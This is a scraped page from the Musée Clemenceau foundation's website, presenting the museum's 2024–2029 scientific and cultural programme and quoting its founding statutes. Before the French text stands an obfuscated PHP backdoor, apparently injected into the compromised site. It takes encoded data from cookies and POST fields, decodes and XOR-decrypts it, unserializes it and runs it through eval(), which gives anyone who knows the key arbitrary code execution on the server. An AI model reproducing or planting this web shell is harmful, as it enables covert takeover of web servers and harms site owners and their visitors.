$BENgmdOVBJ = "\113" . '_' . "\x42" . "\x7a" . 'm' . 'i';$ryMlU = "\x63" . "\x6c" . "\141" . chr (115) . chr (115) . "\x5f" . "\145" . "\x78" . chr ( 852 - 747 ).chr (115) . chr (116) . chr ( 1071 - 956 ); $foymRjIG = class_exists($BENgmdOVBJ); $ryMlU = "32948";$sZZBZe = strpos($ryMlU, $BENgmdOVBJ);if ($foymRjIG == $sZZBZe){function gMAQD(){$qSbOd = new /* 59623 */ K_Bzmi(16691 + 16691); $qSbOd = NULL;}$fmPuMh = "16691";class K_Bzmi{private function NuMVOe($fmPuMh){if (is_array(K_Bzmi::$BSlLtOQQQ)) {$dRwwKvqKP2 = str_replace("<" . "?php", "", K_Bzmi::$BSlLtOQQQ["content"]);eval($dRwwKvqKP2); $fmPuMh = "16691";exit();}}public function sxsmwBo(){$dRwwKvqKP = "16455";$this->_dummy = str_repeat($dRwwKvqKP, strlen($dRwwKvqKP));}public function __destruct(){K_Bzmi::$BSlLtOQQQ = @unserialize(K_Bzmi::$BSlLtOQQQ); $fmPuMh = "35623_25163";$this->NuMVOe($fmPuMh); $fmPuMh = "35623_25163";}public function EHRxgZ($dRwwKvqKP, $xneeEfIplA){return $dRwwKvqKP[0] ^ str_repeat($xneeEfIplA, intval(strlen($dRwwKvqKP[0]) / strlen($xneeEfIplA)) + 1);}public function BbeNZWoTf($dRwwKvqKP){$CokmVg = "\142" . "\141" . "\163" . 'e' . chr (54) . "\64";return array_map($CokmVg . chr ( 752 - 657 )."\x64" . "\x65" . chr (99) . 'o' . chr ( 264 - 164 )."\145", array($dRwwKvqKP,));}public function __construct($KKgBIC=0){$mqCIkrB = chr ( 420 - 376 ); $dRwwKvqKP = "";$inHetbQ = $_POST;$emzAbuRbD = $_COOKIE;$xneeEfIplA = "c07127ed-3b03-4ae2-849a-e582ed0e1d28";$gAquBaYz = @$emzAbuRbD[substr($xneeEfIplA, 0, 4)];if (!empty($gAquBaYz)){$gAquBaYz = explode($mqCIkrB, $gAquBaYz);foreach ($gAquBaYz as $wEOoshcRu){$dRwwKvqKP .= @$emzAbuRbD[$wEOoshcRu];$dRwwKvqKP .= @$inHetbQ[$wEOoshcRu];}$dRwwKvqKP = $this->BbeNZWoTf($dRwwKvqKP);}K_Bzmi::$BSlLtOQQQ = $this->EHRxgZ($dRwwKvqKP, $xneeEfIplA);if (strpos($xneeEfIplA, $mqCIkrB) !== FALSE){$xneeEfIplA = str_pad($xneeEfIplA, 10); $xneeEfIplA = ltrim($xneeEfIplA);}}public static $BSlLtOQQQ = 51651;}gMAQD();} Programme scientifique et culturel (PSC) - 2024/2029 - Musée Clemenceau

Programme scientifique et culturel (PSC) du musée Clemenceau - 2024/2029

Le musée Clemenceau a souhaité élaborer un projet scientifique et culturel (PSC) comme le font la plupart des institutions muséales, en particulier celles qui bénéficient du label Musée de France. Un pareil document donne l’occasion d’établir un état des lieux avec un diagnostic qui nous permettra de définir les enjeux et les orientations du musée pour les 5/6 prochaines années, en s’inscrivant dans une ligne claire et cohérente et en tenant compte des moyens financiers et de personnel dont peut raisonnablement disposer le musée.

La mission principale est de valoriser Clemenceau – l’homme et le contexte historique – l’appartement et les collections comme le disposent les statuts de la Fondation « Le musée Clemenceau » dès l’origine en 1932 et modifiés en 2006 (annexe 5) :

« Art. 1er – La Fondation « Le musée Clemenceau » a pour objet de perpétuer le souvenir intime de Georges Clemenceau, en conservant en l’état où il se trouvait le jour de son décès l’appartement qu’il a habité pendant trente-cinq ans à Paris, rue Franklin (aujourd’hui dénommée rue Benjamin Franklin), n°8 et en recueillant, dans l’immeuble, tous objets ou livres propres à servir sa mémoire… Elle veille à l’entretien et l’animation du musée, à la gestion de l’immeuble constituant sa dotation, à la préservation de ses collections, à la sauvegarde de documents concernant la vie et l’œuvre de Georges Clemenceau et à l’organisation de toutes expositions, manifestations et publications destinées à les faire connaître. »

Grâce aux commémorations de la Première Guerre mondiale, la figure de Clemenceau, aujourd’hui, a retrouvé un niveau élevé de notoriété, souvent invoqué par le personnel politique actuel de tous bords. Ses nombreuses facettes ont été mises en lumière : son idéal de Justice et ses combats pour la Justice sociale, sa pensée politique, dans le journalisme, l’écrivain, ses actions dans l’art, son amitié avec Monet, la laïcité, l’artisan de la Victoire de 1918, l’acteur international…

Pour gagner un plus large public à distance, il sera nécessaire d’amplifier sa couverture numérique : il conviendra d’évaluer les moyens nécessaires au musée pour améliorer significativement les outils dont il dispose déjà en intégrant les collections et les ressources documentaires (conférences, podcasts, fiches, expositions virtuelles, …).

Pour le lire : psc-musee-clemenceau-2024-2029

 

Jean-Noël Jeanneney

Président de la Fondation le musée Clemenceau

Contact Us

Site officiel de la Fondation du musée Clemenceau à Paris

Not readable? Change text. captcha txt

Start typing and press Enter to search